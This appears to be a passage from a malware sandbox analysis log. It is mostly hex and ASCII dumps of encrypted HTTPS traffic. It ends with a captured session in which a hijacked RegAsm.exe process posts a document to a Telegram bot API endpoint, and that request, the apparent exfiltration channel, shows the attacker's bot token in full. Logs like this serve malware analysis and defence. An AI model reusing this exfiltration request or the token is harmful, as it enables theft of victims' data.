                                                                        2021-09-14 16:41:17 UTC199INData Raw: bb fd ac 74 b1 56 c2 36 4c 21 ec 4c 90 6a b1 bf 1e 61 4b 2e 80 0f 79 d2 51 01 9e 40 17 cd 7a 74 9e 2e 4e d7 29 2f 0c 0b ed 6d 7f e0 f7 28 00 67 b3 88 a2 c7 a0 e6 f8 5a 89 b4 55 d6 63 a0 b5 b7 c0 3f 7c d8 eb ab f5 71 df d3 a1 20 2c 7d 32 22 40 be 1d 57 0b ec 00 56 c8 2c 5a 0e 58 4c e0 c5 d4 c2 38 d0 aa d1 3d a4 0d f9 47 95 f2 51 7d 79 ef 58 d2 ea 5c 08 6e e5 3b 0c 07 3e 38 1b 24 0a 8f aa 66 22 23 e3 ea b0 14 4b e9 2b d8 d1 d4 46 0b fd c2 01 43 1c c8 a4 d2 5e b4 5a 79 ac 13 74 55 4d 66 72 67 a7 f4 fb 73 e1 66 32 00 ce d4 96 a0 3e 2e f4 cc 9e 8b 60 51 36 a5 9e 3b d8 5c 37 01 00 b0 24 77 1d da d6 48 4d 59 c4 56 dd 4e 0b ad 8e 5c 71 95 f9 1a 32 b4 2b e8 84 9d 15 78 7c eb 5b c1 5b 0d d4 56 fb 8a a4 70 b0 61 29 a7 16 11 1a 9e 01 3c 2e dd f3 f5 21 88 11 e6 bf 0c
                                                                        Data Ascii: tV6L!LjaK.yQ@zt.N)/m(gZUc?|q ,}2"@WV,ZXL8=GQ}yX\n;>8$f"#K+FC^ZytUMfrgsf2>.`Q6;\7$wHMYVN\q2+x|[[Vpa)<.!
                                                                        2021-09-14 16:41:17 UTC200INData Raw: c5 0a d1 5f 58 94 ca f0 6b e9 c3 74 33 21 21 1b 3f 1a 2d 6a 9a d3 62 ed 53 7b 97 2a 11 fe 22 56 45 66 f6 a2 76 38 08 84 84 82 24 2e 04 28 25 fc 8b 09 88 4d 58 36 98 c1 0d 20 3c d1 6d 70 f8 31 d8 e1 4e a5 82 9a d2 1c 2e 55 83 c6 be 97 f7 c6 b4 61 44 6b d6 85 50 5f b9 b1 5a c5 ac aa 32 e5 87 e2 30 a8 0c fa 8f 2e eb d2 18 a5 f1 5c 90 75 64 a5 5e 45 17 b0 f2 60 8b dc 05 55 2e d8 09 a6 7c 9a b1 50 3f 1f cc 7e 5c 74 74 69 bf 2f e3 54 77 bb 84 a2 e4 02 fe 4e 24 d4 db 2e 5d b7 36 07 85 4f e1 f5 ec e7 41 6d d0 74 60 d2 f9 2c fb fc e1 3f 87 b1 58 70 fe 7e ce a5 dd 82 c6 52 70 22 f4 9a 2b 9f a1 06 bc 55 59 e7 33 f8 19 b7 87 e3 27 66 45 a6 33 83 5a ae 0a 7e 21 89 3a e4 99 57 0d c1 d6 70 22 85 b3 9b 1e 36 79 8e 05 26 12 2f ce 8a 56 82 92 a1 35 c2 82 87 58 65 9b 9f 76
                                                                        Data Ascii: _Xkt3!!?-jbS{*"VEfv8$.(%MX6 <mp1N.UaDkP_Z20.\ud^E`U.|P?~\tti/TwN$.]6OAmt`,?Xp~Rp"+UY3'fE3Z~!:Wp"6y&/V5Xev
                                                                        2021-09-14 16:41:17 UTC202INData Raw: 24 a2 76 88 7f cf 3d 32 21 d6 74 64 4c 82 a5 42 ef 52 eb 2b c4 36 28 ae 63 9a ab d3 ed 6f 64 e3 89 08 6e c5 96 f7 e9 4c 83 c1 2a 04 3e 3d 14 ce fc ac 00 af 6f c6 3f 48 42 db 59 8c 69 ab ba 1a 66 67 5a ab 03 14 d0 7b 17 ab 63 1d d5 5c 48 8b 31 5f d1 30 46 2c 15 ca 7e 6d f1 9e 0e 13 40 ba ac b3 c0 9f 83 ed 47 e6 bd 4b b3 30 9e bd ae f7 2e 7d c1 e7 84 ea 73 b0 e2 a4 3b 37 75 32 2e 48 be 05 79 14 ee 6f 70 d3 21 62 02 2a 73 d1 b7 ef ca 4e e7 b9 cc 3c cb 23 8b 6b b7 f4 4d 0d 40 f5 60 d4 e2 51 1a 7b fe 0d 04 6b 1e 31 0f 3d 6f cd 83 03 15 06 86 d7 bc 7b 6f f5 4f cd cb b5 75 00 fd cf 0b 2a 3c c8 94 ff 43 b7 48 6b a3 71 51 43 52 7b 67 67 ae 91 fa 78 e9 6a 27 0b ce d1 9d d4 02 03 95 c6 a7 f9 45 40 3d a5 ad 36 de 66 05 06 21 a1 20 6d 74 fa f8 4c 40 6d df 5b c5 69 0d
                                                                        Data Ascii: $v=2!tdLBR+6(codnL*>=o?HBYifgZ{c\H1_0F,~m@GK0.}s;7u2.Hyop!b*sN<#kM@`Q{k1=o{oOu*<CHkqQCR{ggxj'E@=6f! mtL@m[i
                                                                        2021-09-14 16:41:17 UTC203INData Raw: cd ec 56 42 19 52 10 33 73 1c 03 f4 d4 7e df 2e c8 df 98 72 41 b4 a3 47 ba 7a 6b c2 66 ca 16 79 a0 19 5e c9 fb 76 3f f0 86 84 ef 46 d4 35 ff f6 1b e7 52 67 90 e0 c0 76 f7 c3 13 54 00 3a 33 02 1e 2b 6d 8a cb 73 e6 7e 7a 87 44 56 fc 33 72 68 4e ec b7 49 38 21 b2 84 93 23 42 32 14 32 e5 87 13 bc 25 6e 2d 91 de 1b 3c 59 c0 76 02 d2 30 bf a5 75 ca 94 81 a0 33 2f 32 c4 ee db ab cb b2 85 67 47 7c b7 a4 40 69 a5 c5 6b c3 b2 b4 66 d9 fe f0 2b cd 03 bb cb 3f e5 a5 15 a4 96 39 ab 1a 56 8c 45 74 39 de c0 60 c7 fa 06 53 49 da 2f bd 47 9a bc 78 33 15 c6 32 75 7a 11 76 be 12 d2 57 76 da a0 a7 ed 2b d8 47 42 dc be 19 77 96 31 15 f7 68 c0 9b c9 e0 41 6f d1 18 40 ec 9c 18 e0 95 c9 39 ce 97 56 1f 9f 51 ab b3 e3 e7 f9 40 6d 2e f2 d3 21 91 ce 63 87 30 4d e6 52 f3 18 cd 81 f2
                                                                        Data Ascii: VBR3s~.rAGzkfy^v?F5RgvT:3+ms~zDV3rhNI8!#B22%n-<Yv0u3/2gG|@ikf+?9VEt9`SI/Gx32uzvWv+GBw1hAo@9VQ@m.!c0MR
                                                                        2021-09-14 16:41:17 UTC204INData Raw: 17 8a 38 27 29 40 5e fa a6 3e 9e 5c 24 77 1e f9 55 d5 55 79 46 2d 40 a8 fe a9 5c 0c e1 46 2a 77 f1 44 c0 d9 2b 6a b1 2a 9c b9 c8 19 0b 07 cd 24 ad 48 b7 74 d8 3f 2b 64 c3 63 7f 61 d5 a6 4c fe 58 e3 5f e6 21 2e 9e 41 fb be d7 f4 30 48 fb e4 09 66 b7 b6 ff 8a 42 8b d4 19 1e 2f 28 18 bc ee bd 1b 82 26 fb 1f 4b 37 e0 5d 8b 64 ab 92 0d 12 63 4f a0 0f 73 d2 73 06 9a 51 3b db 53 7e 91 36 6e da 28 2b 06 17 ce 78 63 f7 f7 27 11 67 86 b1 b2 c8 97 f1 ea 5e 89 a8 26 f2 00 93 b9 b5 f3 2e 60 da 84 eb e5 60 b0 e2 cd 61 3c 7b 46 09 5b cd 20 57 16 e0 74 6d c8 55 49 1d 4f 5e f1 a0 c2 c2 2d c7 a1 d2 2c cb 3c 8b 61 86 e3 55 09 51 df 5a c5 f1 46 19 69 fe 0d 69 39 3e 3e 1e 19 01 fb bd 77 24 68 cf fd 81 0f 58 9b 02 e2 c1 e6 46 03 89 d4 11 58 68 c0 b3 e4 73 93 42 7f bf 71 5a 43
                                                                        Data Ascii: 8')@^>\$wUUyF-@\F*wD+j*$Ht?+dcaLX_!.A0HfB/(&K7]dcOssQ;S~6n(+xc'g^&.``a<{F[ WtmUIO^-,<aUQZFii9>>w$hXFXhsBqZC
                                                                        2021-09-14 16:41:17 UTC205INData Raw: 05 5f 85 57 da 46 8d e7 59 8e 53 c9 19 65 90 12 4c 30 42 20 9f a9 aa ef 6d 67 02 91 f7 30 e9 28 d6 6c fc aa 3b b0 30 dd 90 ae c0 fa 38 a9 9b d6 f1 33 61 39 5e 3c 3d 67 0f 0f de d4 1d f5 24 db c4 99 1d 7c cd 83 47 ad 7e 2b f1 4c c8 1e 7b b2 6b 65 cf fa 6c 56 cf 96 a2 8a 4d c1 24 d2 c6 6f f2 5b 58 aa f8 e0 6f e1 c3 70 56 01 1e 0d 23 17 2f 6e 8a e5 64 ec 3a 66 95 5e 09 fa 32 70 56 61 e3 a6 66 0d 39 84 8a 89 28 36 04 09 22 8e a7 09 8c 22 7f 3c 87 e1 0d 20 38 ef 7c 76 f4 2d cc e1 55 ba b4 9c c1 01 2f 40 f0 81 96 82 ca d3 a1 6d 47 69 b8 a2 66 51 ab b6 5b ac 81 a2 5c d2 97 e5 2d a2 0f b5 a7 1f e5 c8 01 aa e4 39 8b 78 5b 8c 52 5f 3c d5 d5 7c c7 f5 02 5e 4b fe 0f b1 46 8c ac 31 3a 16 dd 6d 60 66 17 79 bf 28 cf 31 5e bf 92 8d f4 3c e3 4c 4a c7 ee 28 6d 99 20 13 f6
                                                                        Data Ascii: _WFYSeL0B mg0(l;083a9^<=g$|G~+L{kelVM$o[XopV#/nd:f^2pVaf9(6""< 8|v-U/@mGifQ[\-9x[R_<|^KF1:m`fy(1^<LJ(m
                                                                        2021-09-14 16:41:17 UTC207INData Raw: 81 03 75 2e e5 31 10 a1 24 0c 49 c8 45 e3 27 9c c6 8f da 4d ba 7c 7d 46 69 63 b6 da 2c 63 d6 33 58 b9 a8 17 42 b6 33 b6 5c e2 f4 7e 62 72 68 0b fe 7e 2c 23 5b 73 ae 8c 2f 90 7e 3f 67 20 ff 3a f8 55 6e 71 00 53 a8 d2 b4 29 21 f9 23 0e 6b c5 77 cc d0 2b 79 b1 6f ac ae c0 02 65 15 cb 33 98 4a ac 1e ff 1f 2d 58 c1 65 54 76 b6 87 5a ed 47 86 69 e0 21 25 81 47 be b7 d1 f2 16 76 fa 89 3f 6b b7 97 fb 8d 78 92 d4 07 39 4a 1b 16 a0 f9 ac 06 84 26 d5 3f 51 1d dd 57 8b 71 df 8e 1a 66 71 7e a1 1c 60 b7 79 06 80 7a 3d d7 4d 7e 80 2c 4a d8 0e 23 11 13 ca 7e 5c ea 85 14 74 60 a6 ab 98 ec 9c f7 ee 58 88 bb 4a e0 06 95 a6 a6 e0 0a 60 da f0 c5 d5 7b ad e4 cd 28 3a 6c 6d 16 46 bf 19 38 0b ec 74 5d ca 3a 78 1b 2a 79 f1 b5 d1 c2 2c e7 bd d3 2d c1 3d ff 22 bc f2 40 0d 63 ff 56
                                                                        Data Ascii: u.1$IE'M|}Fic,c3XB3\~brh~,#[s/~?g :UnqS)!#kw+yoe3J-XeTvZGi!%Gv?kx9J&?QWqfq~`yz=M~,J#~\t`XJ`{(:lmF8t]:x*y,-="@cV
                                                                        2021-09-14 16:41:17 UTC208INData Raw: 86 3a 6d 69 5d 80 e5 21 ba df 93 ea e1 ef 90 f5 df 1f 8c d3 8f 9b 8d f0 f1 5e 38 34 0f 6e 0c 53 05 6c a4 29 49 1a 2a b2 87 f2 ee 50 d7 e1 87 07 52 ec 5f d1 41 d2 e7 59 8e 5f c2 22 67 9d 7b 44 3b 45 7f bb ad ae d1 49 7c 19 9d 87 12 9c 2e df 71 d7 90 53 be 32 f1 d5 98 d0 ef 17 a8 8e dd 82 5c 56 03 63 1b 35 77 1d 0b f7 d3 0a e3 40 d9 d3 9e 42 5f c6 99 5c ba 7a 71 dc 25 d6 1e 7d 9e 1b 45 d3 fb 6a 56 d6 8a ea bc 58 c2 35 c5 d8 41 c6 5b 4f 80 eb ed 6d f9 ad 5a 40 2b 3b 00 3d 39 30 4e 93 f0 62 e6 3a 57 b3 58 2f eb 22 41 52 7b d0 b1 6d 2d 3d 84 9f 9d 4d 00 22 09 28 fe 96 34 8a 39 4b 2b 9a c1 09 20 2d fb 19 71 f4 2b e0 b1 68 a5 a9 97 a0 3c 17 57 e1 d1 a9 8c dc cb c6 4b 46 65 a6 b4 4a 5c b8 a1 78 de ad b5 4b b6 b8 f8 28 a8 32 ad b8 28 ef c8 21 b9 f9 24 bd 1a 76 8c
                                                                        Data Ascii: :mi]!^84nSl)I*PR_AY_"g{D;EI|.qS2\Vc5w@B_\zq%}EjVX5A[OmZ@+;=90Nb:WX/"AR{m-=M"(49K+ -q+h<WKFeJ\xK(2(!$v
                                                                        2021-09-14 16:41:17 UTC209INData Raw: eb 8d c8 b6 97 1e c2 dc 6b bc 8f 7f af db 0a 3a 48 3a 7d 78 7e d0 a1 9b 5c 37 3e 76 6c 8e a5 d4 b8 8b 08 1a 42 b4 77 86 b8 c9 97 50 d0 da bc e3 7f 38 ed 5d 51 e2 15 58 f8 9c 9c 10 b4 c9 09 9e fc bb 20 ee 7c 10 29 3d 3f fb bb 5e 82 4f 67 b6 24 fc 78 2a d0 5b b1 1b 84 88 3c 24 15 15 62 aa 7d 4a 5b 2a 24 f2 e0 4c f9 3c 5e 1c 4b 8c 38 ad 6d 12 37 68 33 c8 f4 d5 4f 48 84 2d 59 84 a0 38 bd 32 4b 07 cb 61 fc 4a ae 79 8a 45 ad 70 fd 28 59 13 b8 7c 5f 33 30 00 15 33 d5 e7 a2 88 37 a6 2a bf 5d 5f d1 33 f9 da 92 80 64 02 8e 88 66 1f c1 f2 9b e4 26 e3 b5 77 40 47 50 7d ce 8e c7 79 f5 26 b3 54 34 6a 82 3f fe 0d d1 e0 6d 77 3c 4b dc 07 1c aa 0c 06 f0 25 74 ab 5c 1d f2 43 36 a6 38 48 68 62 ab 11 1e 04 d2 72 f5 36 cb d7 c1 a5 f2 9e 99 ab c3 df 06 b3 72 66 f9 ca 92 58 0d
                                                                        Data Ascii: k:H:}x~\7>vlBwP8]QX |)=?^Og$x*[<$b}J[*$L<^K8m7h3OH-Y82KaJyEp(Y|_3037*]_3df&w@GP}y&T4j?mw<K%t\C68Hhbr6rfX
                                                                        2021-09-14 16:41:17 UTC210INData Raw: e3 c3 33 5a 66 bb b3 be 12 6a 1a df 7b bd 22 19 d2 e0 ee 83 4f 99 3a 24 b5 ae 5b 03 e4 45 7c 8d 0d 8a e9 b3 92 5d 34 b6 72 25 b9 e5 76 8f fe a2 57 86 fb 2c 61 8f 17 cf d2 a7 03 06 32 1a 41 89 88 ce 7a a0 7d d4 d5 9f 88 70 91 64 a5 61 1f 52 2c 07 46 04 f3 23 cf 7a 14 67 f4 5c 9e 18 8d 63 a2 a8 17 d7 7d ee e8 ec c7 78 da e8 13 6f 52 dc 46 73 f5 f4 af 50 b5 9f ca 74 0f 97 ee 6a d0 8b 22 2d 01 74 d4 91 6f 7c 73 64 a3 fe 84 b4 be 9b de a0 80 3a 6d 5b 91 a7 a4 ff 1e 2b 13 0c ab e6 6d d4 49 86 2e 01 29 15 78 97 27 cc a9 34 38 38 7d 42 80 b9 5a 7b e7 3a 73 42 5d b0 e9 8a a1 84 2b 42 66 bd 8d 65 43 7f f9 51 0b d6 23 6a 20 93 94 e6 5b 91 84 89 a1 7e dc fd bb 3e 13 29 eb 34 ea 03 a8 f7 76 cc 79 41 23 cd 55 37 a2 86 92 a0 61 1b 1d 64 84 6f ca ef 29 39 e8 64 d5 fa 33
                                                                        Data Ascii: 3Zfj{"O:$[E|]4r%vW,a2Az}pdaR,F#zg\c}xoRFsPtj"-to|sd:m[+mI.)x'488}BZ{:sB]+BfeCQ#j [~>)4vyA#U7ado)9d3
                                                                        2021-09-14 16:41:17 UTC211INData Raw: 70 3d 65 8c 0e 1f bf 5d 02 72 2f 23 99 d7 04 86 46 a8 dd bf 5d b9 4b 83 2a e9 83 26 ff 21 87 31 a8 9e 3a 7b 9f 9c 6d eb 66 46 5a 67 55 72 8a f0 06 58 66 9b 96 c0 f9 37 86 4a 96 a0 a8 37 7c 7f 92 78 2f 66 b5 bf 97 0c d9 2c 19 cd 62 19 3d 1e 10 06 01 40 fd bd 18 83 1e 43 78 cb ba f4 d1 7c 68 9f bf cc f1 01 23 53 a7 c0 4e af 31 5a 65 56 c5 57 81 71 b3 85 be 3c 21 a7 32 a8 3b 73 a8 c0 0d 2c c6 81 74 4b c7 cf 3d ec f5 7b 00 9f b7 32 a1 47 53 be 26 97 fe d4 08 c0 3a 51 d5 7b 65 7b eb 75 d9 56 a7 81 87 49 f8 e4 06 d4 06 ce e8 ab 39 3e e5 50 4c 3d cd 50 10 9f 79 34 b7 f6 a8 1a 51 e3 d7 81 e4 41 53 25 3c e5 83 5b cd d7 e6 e6 9b be cc 92 a5 77 e7 86 f5 62 27 97 9a 37 5c 7c 6a 02 71 48 74 6b e0 58 22 66 50 ca cd 91 9c 31 a9 9b e6 7b 23 fd ba f9 38 8a bd 32 f5 2b ad
                                                                        Data Ascii: p=e]r/#F]K*&!1:{mfFZgUrXf7J7|x/f,b=@Cx|h#SN1ZeVWq<!2;s,tK={2GS&:Q{e{uVI9>PL=Py4QAS%<[wb'7\|jqHtkX"fP1{#82+
                                                                        2021-09-14 16:41:17 UTC212INData Raw: 2a 1e 57 e3 3f 3a c0 d0 3a 2e cb cf 3c b8 f0 9f 4a d0 6f da c5 49 9b 27 c0 c9 98 52 cc 07 3f e2 11 2b 65 a2 24 a2 c5 a0 6b 21 2f b8 79 c0 a1 52 dd 3f 53 78 89 32 26 02 f6 ab d8 48 bc 22 18 dd f3 df 03 ff 93 27 2a bb b9 58 10 7b 70 72 05 e9 93 f2 a5 81 54 3b 3a 7d 27 b4 f7 64 9d e1 a8 59 89 ec 21 f2 2e 14 c0 c9 bd 9f 85 3a 03 44 92 94 41 e5 c8 7e da 53 3f 8c 32 91 7f b9 f2 81 56 2c 07 46 d9 f1 23 dc 76 08 eb 5d 5b e5 8b 95 c3 aa 86 04 44 62 42 f4 68 7e 79 da eb ee 67 67 cf d5 b5 37 f2 a4 52 a6 eb d6 13 12 f9 fa 16 d0 63 a9 45 1d 00 c8 f6 75 08 6f 05 9c 90 86 c8 be 73 55 c8 80 d2 3f 27 91 4f 2f 97 02 57 13 e4 20 8e 6d 3c 1b e1 32 66 29 fc ca f0 27 cc b3 40 33 24 f2 0c 9c de 5c 74 80 20 10 50 37 b3 02 51 d4 87 c0 9d 13 aa c4 77 38 ed 01 4e 62 c7 5f 6a c8 18
                                                                        Data Ascii: *W?::.<JoI'R?+e$k!/yR?Sx2&H"'*X{prT;:}'dY!.:DA~S?2V,F#v][DbBh~ygg7RcEuosU?'O/W m<2f)'@3$\t P7Qw8Nb_j
                                                                        2021-09-14 16:41:17 UTC214INData Raw: a5 de 43 61 76 af 1f 0d 8c e2 71 f7 16 c1 d1 d5 24 b2 87 ab 2a f5 db 32 b4 69 e9 cd c6 8e 48 8d 89 98 d7 ef 09 da 8d d1 52 43 05 30 6f 09 cf 7f ba 4d 94 05 1f bf 59 0d 69 37 3a 99 d8 9a ba 52 a8 da aa 56 a4 48 8a 3e e6 b3 3a 60 28 87 3a bb 91 0a 6f 3d 93 7e 67 76 5e 56 7a 54 72 8a e3 1e 53 60 8e a7 d5 63 3f 89 ce 12 a4 a7 b3 2e e8 95 e4 b3 69 b5 57 d0 22 c7 23 04 c5 6c 1d 3e 0c 93 13 0f ca e9 b1 0a 91 1f 54 e4 8e a1 9a dc 7c 6e 88 be d4 e5 14 39 4e a7 cd 53 a8 2b d4 dc 5d ca 6d 04 65 ac 85 bd a0 2a bf b5 e8 2f 7c 2c 44 09 22 40 d1 60 4b db 53 a7 fe fb e5 14 10 8c ae e4 53 46 a9 52 99 62 69 1d ca 2d 4c cf 7d 6d 75 e4 6c 50 7e 2b ca 8f 48 e9 6c 9c d4 1d 4c a6 af 24 38 e3 4e 55 b5 55 41 11 94 79 20 b9 e7 a8 11 49 eb c3 88 e4 47 4b 23 3a e6 83 55 cb d1 fa 87
                                                                        Data Ascii: Cavq$*2iHRC0oMYi7:RVH>:`(:o=~gv^VzTrS`c?.iW"#l>T|n9NS+]me*/|,D"@`KSSFRbi-L}mulP~+HlL$8NUUAy IGK#:U
                                                                        2021-09-14 16:41:17 UTC215INData Raw: 43 f7 4c d8 0f fa 67 78 5d 66 6f 5f 80 ff 6f f2 45 06 51 e8 b9 71 5a 51 8a 11 1f 99 57 a2 e9 12 c2 c3 87 a8 7d 48 2f 8b 84 db e1 a6 bc c8 21 2d 1e c3 c4 a4 a4 cb d7 a9 ec cc c3 27 a4 7f 08 45 df e0 94 c5 52 84 b8 7f c3 8b 59 cc 07 34 f4 34 23 62 31 e6 1d ae bb 63 38 29 b7 62 dc 2d f1 d7 3f 55 7b b2 35 3f 0f 66 98 ef 55 a1 34 04 df fb cb 93 cc 14 34 21 ae bb 48 80 e7 58 65 97 64 8e f5 ad 93 5c 2c a5 71 34 bd f1 64 9b e1 a5 45 05 78 3e 6d 9a 04 4d fe a7 eb 8e 13 04 53 1f a3 45 d7 a4 6b c9 50 37 87 2e 9c 79 b2 c0 87 52 24 16 c3 47 f2 31 c9 7c 1a 68 f4 47 a3 9e 1e 77 be 27 9c 57 f2 7a ba 7f 3a 77 dd 7b d2 f8 46 dc 46 77 f8 f4 b3 d3 e7 f8 cd 0c 9f 4f fe 0d d7 f0 b2 4d 11 13 c8 ed 6c 97 d0 0f bf 99 9f da a9 fc de 48 0f 5b 77 3a 85 ee b7 84 8d df 02 6f be 89 77
                                                                        Data Ascii: CLgx]fo_oEQqZQW}H/!-'ERY44#b1c8)b-?U{5?fU44!HXed\,q4dEx>mMSEkP7.yR$G1|hGw'Wz:w{FFwOMlH[w:ow
                                                                        2021-09-14 16:41:17 UTC216INData Raw: cd f1 b2 e9 21 e2 b3 64 cd d2 5c 7c ce 8f c9 70 f6 26 b2 5a 21 45 8d 38 f9 01 30 fe 7f 12 2a 28 df ee 88 b3 5e 63 f4 25 70 b9 3b 1b f2 46 2b b0 5d 46 67 65 bf 0c 0c 81 f8 60 74 13 c7 2f c7 a5 f2 87 8b 25 e6 da 22 b3 93 e7 d0 c1 94 5d 0d ae 8f c0 80 09 ce 10 61 4a 59 05 23 e6 81 cb 6a 3c 70 81 08 0a be 75 0b 67 22 32 82 cf 84 ad 46 bd c4 bf 5d ac 46 83 2a f1 a6 36 77 3c 92 30 86 82 3d 63 1a 96 7a 62 60 53 57 72 55 4f 8d e6 0b 5e 7d 81 83 d9 7c 22 86 45 83 af a9 38 72 f5 80 74 a9 e9 af de 98 24 df 0d 0b cc 7a 13 30 1c 03 90 92 d3 77 3e 07 0e 82 40 65 cf bb e2 57 e0 64 95 a0 c1 e8 8a a4 42 26 4b 58 aa 3b 44 e7 56 d6 c7 06 66 3b 92 38 24 3a 2d 98 ac 3c 7f 2e 5c 0e 30 c0 9a 79 d4 54 49 a9 f1 ee 76 92 9f 9a 2f a5 50 52 a2 3c 9f e1 c3 09 ca 2e 51 d8 f3 c7 73 f6
                                                                        Data Ascii: !d\|p&Z!E80*(^c%p;F+]Fge`t/%"]aJY#j<pug"2F]F*6w<0=czb`SWrUO^}|"E8rt$z0w>@eWdB&KX;DVf;8$:-<.\0yTIv/PR<.Qs
                                                                        2021-09-14 16:41:17 UTC218INData Raw: 5e 86 98 ea ac f1 e5 e8 24 a0 c1 59 a7 ef 71 2c ac 20 8b 04 fd 88 a4 13 31 77 ce 88 5f 67 c2 f2 f6 87 14 8d ba f1 e2 aa b2 97 56 05 25 8f 64 d1 82 88 49 76 12 e6 45 45 63 69 d1 62 f0 e7 1e 46 3b 5d e7 31 80 43 d9 6a 17 0c 9f 59 b8 e3 08 4a 3d e6 b0 55 45 20 03 6d ca 63 4c bc d4 88 ff 1d 57 ef 2b 35 cd c7 3a 2c 2e df b2 5a ec 96 48 d0 6f da c3 52 97 ab 7f c5 95 54 d9 14 39 f4 3f 22 50 b4 a7 1e 47 5b 65 3c 20 b7 6b d4 2a f6 d7 3b 55 7b 81 35 21 1b 61 08 5b c2 bd 23 99 36 f3 dc 00 d7 90 3b a4 5f b9 50 0b e8 c4 15 87 0a 8e ff a6 86 46 20 a9 f5 1c b3 eb ea 7f fa a6 55 80 e4 35 78 95 36 ce d2 a7 03 12 32 16 c1 70 96 48 f0 a3 6d d6 49 22 93 2e 83 6c b5 e7 86 51 38 1b d6 c1 c9 2a e1 7a 18 7b 68 a5 82 90 34 60 ae b4 85 ba f2 7b 2f 61 59 7f d5 6c 59 63 55 4e 12 2a
                                                                        Data Ascii: ^$Yq, 1w_gV%dIvEEcibF;]1CjYJ=UE mcLW+5:,.ZHoRT9?"PG[e< k*;U{5!a[#6;_PF U5x62pHmI".lQ8*z{h4`{/aYlYcUN*
                                                                        2021-09-14 16:41:17 UTC219INData Raw: b9 6e 09 d0 7d 6f 52 a6 79 8a 5c a3 70 fc 3b cd 0c 3c c5 5e 33 30 19 33 14 da e7 a2 00 3d 94 aa 3e 56 59 f4 21 7a d1 a3 01 6b 0e 93 8c 63 1e c0 fa 87 ec 3e f7 34 d0 4c 58 d9 71 c9 af cb 66 71 bb bc 46 22 62 8f 2a 78 98 d7 f5 77 07 3f af 6b 6f 06 36 16 66 dc 25 65 38 3d 11 da 42 3e a6 dc df 62 77 2e 04 08 83 e5 e2 49 18 e3 db c6 b7 70 be 96 2f fb df 2e b9 64 e1 d8 de 97 47 0a a0 8c cd 85 1e de 98 c7 5f 5e 1a 2c 66 39 d3 6d 26 78 8f 20 00 a7 50 02 61 26 4c 85 ad 86 c6 4e 80 d8 93 58 96 4e 9d 25 fa 9b 31 60 31 86 28 ae 8b 22 75 00 8d 62 6b 63 53 43 67 4c 67 8b ed 02 53 74 83 b3 d3 66 2f 99 5f 8c ad a9 2f 6b e0 9b 78 36 75 bb cb 8c 31 de 25 0e cb 63 9c 31 1b 12 13 01 46 f5 b9 11 8f 1e 43 77 a7 b9 d3 d7 7c 68 88 a7 d4 fc 14 20 59 a2 cc 4e af 24 53 6b 5b cc 4d
                                                                        Data Ascii: n}oRy\p;<^303=>VY!zkc>4LXqfqF"b*xw?ko6f%e8=B>bw.Ip/.dG_^,f9m&x Pa&LNXN%1`1("ubkcSCgLgStf/_/kx6u1%c1FCw|h YN$Sk[M
                                                                        2021-09-14 16:41:17 UTC220INData Raw: e9 53 51 42 ae 90 e9 a5 8e 7b c1 fa a4 82 33 26 5c 2a 75 50 07 68 6a 9b ba 7e 0a 40 be b6 4a 9d 2c b4 8c 31 c8 13 05 a5 25 a5 7b 09 c1 6b 17 39 97 18 d5 a3 f3 ea ef 21 b1 41 a0 b5 6f 95 42 2e c1 99 84 19 d6 ad 40 33 3a 4e 3a 51 33 42 59 fe d3 16 d6 3a 5a f0 64 56 c4 56 4f 37 41 80 85 02 12 58 f6 eb e4 4d ff 65 94 af 8e e2 66 ef 4d 1b 59 f5 b1 6c 52 59 82 19 02 91 5f bf e1 1a f5 d1 ee a0 75 40 32 83 85 db e3 a4 b3 c6 08 2a 0c d6 d6 25 3d ca c5 28 ac c2 cd 32 f2 fe 91 44 cc 61 82 cb 3d 8a d7 71 8d 96 35 c4 76 31 8c 31 62 70 de a6 69 c7 dc 6b 32 2e bf 6c f6 23 fb df 31 5d 27 a9 40 33 72 74 74 da 28 bc 5d 19 bb e6 ba 81 27 91 46 24 dd be 5a 02 fa 45 60 85 bd 8d 29 ae 8f 41 28 b8 27 25 ce f9 18 93 95 a6 39 87 9e 30 36 9f 7f ce ab b5 e7 8b 7a 04 2f 9c fc 4f 98
                                                                        Data Ascii: SQB{3&\*uPhj~@J,1%{k9!AoB.@3:N:Q3BY:ZdVVO7AXMefMYlRY_u@2*%=(2Da=q5v11bpik2.l#1]'@3rtt(]'F$ZE`)A('%906z/O
                                                                        2021-09-14 16:41:17 UTC221INData Raw: 78 2b d8 47 b6 3b 87 80 21 21 1d 1d 65 8a 7e 4b 46 2f 2c fa e5 4c fb 3d 50 12 4e 8b 3a bf 30 1a 32 68 32 da 91 db 5c 4f 8d 23 4b 05 a1 36 af b3 4e 09 c5 6f ee cb a7 6b 0b 54 a8 50 fd 3a d8 1e bd 5c 5f 21 b1 11 10 13 d5 f5 23 9d 33 86 2b a3 53 5c f1 33 fb d9 b2 80 6f 06 8e 89 6b 03 c5 f2 9a e9 2b e6 b5 75 4d 4a 58 79 ce 8f c9 74 f0 26 b2 5a 25 42 8d 38 f9 05 df fd 7f 12 2e 2e ce 6e 14 b7 1e 63 f4 25 74 c9 3a 1b fe 42 2b b4 6d 71 63 65 af 0c 0c 85 f7 60 74 13 c3 df c7 a5 f2 83 8b 2a e6 da 26 b3 63 e7 d0 c3 92 5a 0f a8 84 c5 86 14 df 90 cd 4f 5f 18 32 66 29 cd 6d 38 78 89 00 02 ba 55 0a 6f 2a 3f 85 c5 86 a7 4e b5 d8 a2 58 a4 4e 8b 22 f4 86 34 7d 34 9a 34 a6 83 3f 69 1d 91 7f 69 6b 5b 5f 7a 50 6f 8f ed 03 56 68 86 93 d2 7b 2a 9b 4f 8b a5 b5 32 6e fd 87 65 2a
                                                                        Data Ascii: x+G;!!e~KF/,L=PN:02h2\O#K6NokTP:\_!#3+S\3ok+uMJXyt&Z%B8..nc%t:B+mqce`t*&cZO_2f)m8xUo*?NXN"4}44?iik[_zPoVh{*O2ne*


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        2192.168.2.449840149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        2021-09-14 16:42:56 UTC222OUTPOST /bot1996953049:AAH2EyLl5sWiWWep1n_p6ZBPPY3UEsTqo0M/sendDocument HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=---------------------------8d977c904b0d17d
                                                                        Host: api.telegram.org
                                                                        Content-Length: 1006
                                                                        Expect: 100-continue
                                                                        Connection: Keep-Alive
                                                                        2021-09-14 16:42:56 UTC222INHTTP/1.1 100 Continue
